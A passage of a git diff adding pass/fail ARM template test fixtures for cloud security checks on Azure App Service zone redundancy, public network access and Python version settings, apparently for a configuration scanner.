+      "name": "fail2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "resourceGroupName": "[resourceGroup().name]",
+        "osType": "Linux",
+        "sku": {
+          "name": "P1v2"
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/pass.json b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/pass.json
new file mode 100644
index 00000000000..9009c374ac4
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePlanZoneRedundant/pass.json
@@ -0,0 +1,20 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/serverfarms",
+      "apiVersion": "2021-02-01",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "zoneRedundant": true,
+        "resourceGroupName": "[resourceGroup().name]",
+        "osType": "Linux",
+        "sku": {
+          "name": "P1v2"
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configFail.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configFail.json
new file mode 100644
index 00000000000..0450ca1b365
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configFail.json
@@ -0,0 +1,16 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/config",
+      "apiVersion": "2021-02-01",
+      "name": "configFail",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+        "publicNetworkAccess": "Enabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configPass.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configPass.json
new file mode 100644
index 00000000000..16aaffd905b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/configPass.json
@@ -0,0 +1,16 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/config",
+      "apiVersion": "2021-02-01",
+      "name": "configPass",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+        "publicNetworkAccess": "Disabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxDefault.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxDefault.json
new file mode 100644
index 00000000000..301dd920d1d
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxDefault.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "linuxDefault",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxFail.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxFail.json
new file mode 100644
index 00000000000..8ba6c986143
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxFail.json
@@ -0,0 +1,16 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "linuxFail",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+        "publicNetworkAccess": "Enabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxPass.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxPass.json
new file mode 100644
index 00000000000..c9d67aa870b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/linuxPass.json
@@ -0,0 +1,16 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "linuxPass",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+        "publicNetworkAccess": "Disabled"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotFail.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotFail.json
new file mode 100644
index 00000000000..a5b2e81ae04
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotFail.json
@@ -0,0 +1,16 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2021-02-01",
+      "name": "slotFail",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+        "publicNetworkAccess": "Enabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotPass.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotPass.json
new file mode 100644
index 00000000000..c7eea5b1b54
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/slotPass.json
@@ -0,0 +1,16 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2021-02-01",
+      "name": "slotPass",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+        "publicNetworkAccess": "Disabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsDefault.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsDefault.json
new file mode 100644
index 00000000000..6c36e64a56b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsDefault.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "windowsDefault",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsFail.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsFail.json
new file mode 100644
index 00000000000..f87d524a700
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsFail.json
@@ -0,0 +1,16 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "windowsFail",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+        "publicNetworkAccess": "Enabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsPass.json b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsPass.json
new file mode 100644
index 00000000000..16252841a9a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePublicAccessDisabled/windowsPass.json
@@ -0,0 +1,16 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "windowsPass",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'exampleServicePlan')]",
+        "publicNetworkAccess": "Disabled"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json b/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json
new file mode 100644
index 00000000000..4b3064a7f0b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json
@@ -0,0 +1,381 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "fail",
+      "version": "0.25.53.49325",
+      "templateHash": "16144177164140676603"
+    }
+  },
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]",
+      "minLength": 2,
+      "metadata": {
+        "description": "Web app name."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "F1",
+      "metadata": {
+        "description": "The SKU of App Service Plan."
+      }
+    },
+    "language": {
+      "type": "string",
+      "defaultValue": ".net",
+      "allowedValues": [
+        ".net",
+        "php",
+        "node",
+        "html"
+      ],
+      "metadata": {
+        "description": "The language stack of the app."
+      }
+    },
+    "helloWorld": {
+      "type": "bool",
+      "defaultValue": false,
+      "metadata": {
+        "description": "true = deploy a sample Hello World app."
+      }
+    },
+    "repoUrl": {
+      "type": "string",
+      "defaultValue": "",
+      "metadata": {
+        "description": "Optional Git Repo URL"
+      }
+    }
+  },
+  "variables": {
+    "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]",
+    "gitRepoReference": {
+      ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started",
+      "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world",
+      "php": "https://github.com/Azure-Samples/php-docs-hello-world",
+      "html": "https://github.com/Azure-Samples/html-docs-hello-world"
+    },
+    "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]",
+    "configReference": {
+      ".net": {
+        "comments": ".Net app. No additional configuration needed."
+      },
+      "html": {
+        "comments": "HTML app. No additional configuration needed."
+      },
+      "php": {
+        "phpVersion": "7.4"
+      },
+      "node": {
+        "appSettings": [
+          {
+            "name": "WEBSITE_NODE_DEFAULT_VERSION",
+            "value": "12.15.0"
+          }
+        ]
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "fail",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "3.4",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json b/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json
new file mode 100644
index 00000000000..15f4d5e5a36
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json
@@ -0,0 +1,381 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.25.53.49325",
+      "templateHash": "16144177164140676603"
+    }
+  },
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]",
+      "minLength": 2,
+      "metadata": {
+        "description": "Web app name."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "F1",
+      "metadata": {
+        "description": "The SKU of App Service Plan."
+      }
+    },
+    "language": {
+      "type": "string",
+      "defaultValue": ".net",
+      "allowedValues": [
+        ".net",
+        "php",
+        "node",
+        "html"
+      ],
+      "metadata": {
+        "description": "The language stack of the app."
+      }
+    },
+    "helloWorld": {
+      "type": "bool",
+      "defaultValue": false,
+      "metadata": {
+        "description": "true = deploy a sample Hello World app."
+      }
+    },
+    "repoUrl": {
+      "type": "string",
+      "defaultValue": "",
+      "metadata": {
+        "description": "Optional Git Repo URL"
+      }
+    }
+  },
+  "variables": {
+    "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]",
+    "gitRepoReference": {
+      ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started",
+      "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world",
+      "php": "https://github.com/Azure-Samples/php-docs-hello-world",
+      "html": "https://github.com/Azure-Samples/html-docs-hello-world"
+    },
+    "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]",
+    "configReference": {
+      ".net": {
+        "comments": ".Net app. No additional configuration needed."
+      },
+      "html": {
+        "comments": "HTML app. No additional configuration needed."
+      },
+      "php": {
+        "phpVersion": "7.4"
+      },
+      "node": {
+        "appSettings": [
+          {
+            "name": "WEBSITE_NODE_DEFAULT_VERSION",
+            "value": "12.15.0"
+          }
+        ]
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "pass",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "3.10",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json b/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json
new file mode 100644
index 00000000000..7e664c561be
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json
@@ -0,0 +1,381 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "fail",
+      "version": "0.25.53.49325",
+      "templateHash": "16144177164140676603"
+    }
+  },
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]",
+      "minLength": 2,
+      "metadata": {
+        "description": "Web app name."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "F1",
+      "metadata": {
+        "description": "The SKU of App Service Plan."
+      }
+    },
+    "language": {
+      "type": "string",
+      "defaultValue": ".net",
+      "allowedValues": [
+        ".net",
+        "php",
+        "node",
+        "html"
+      ],
+      "metadata": {
+        "description": "The language stack of the app."
+      }
+    },
+    "helloWorld": {
+      "type": "bool",
+      "defaultValue": false,
+      "metadata": {
+        "description": "true = deploy a sample Hello World app."
+      }
+    },
+    "repoUrl": {
+      "type": "string",
+      "defaultValue": "",
+      "metadata": {
+        "description": "Optional Git Repo URL"
+      }
+    }
+  },
+  "variables": {
+    "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]",
+    "gitRepoReference": {
+      ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started",
+      "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world",
+      "php": "https://github.com/Azure-Samples/php-docs-hello-world",
